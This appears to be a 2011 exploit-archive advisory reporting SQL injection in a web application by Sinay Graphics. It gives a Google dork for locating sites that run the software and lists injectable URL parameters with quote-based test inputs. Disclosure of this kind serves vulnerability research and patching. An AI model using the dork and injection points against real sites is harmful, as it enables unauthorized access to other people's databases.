id: 15919
date: 04/23/2011
title: Sinay Graphics SQL Injection Vulnerability
author: Kalashinkov3
cves: 

##################################################################
# Title  Sinay Graphics SQL Injection Vulnerability
#
# Author Kalashinkov3
#
# Vendor [www.sinay-graphics.com]
#
# Email  kalashinkov3@Hotmail.fr
#
# date  2142011
#
# Google Dork  intextcreated by  Sinay Graphics 
#                
# category   Web Apps [SQli]
#       
##################################################################

SQL injection Vulnerability

# http[localhost]maof_ar.phpar_id=10' 
# http[localhost]maof_ar.phpar_id=  [SQLI]
# http[localhost]product.phpprd_id=42'
# http[localhost]product.phpprd_id= [SQLI]


=================================================
# all php files .php_id=[sqli] are vulnerable #
=================================================

# Greets To   All Algerians Hacker'S ;)



#  0day.today [2023-03-23]  #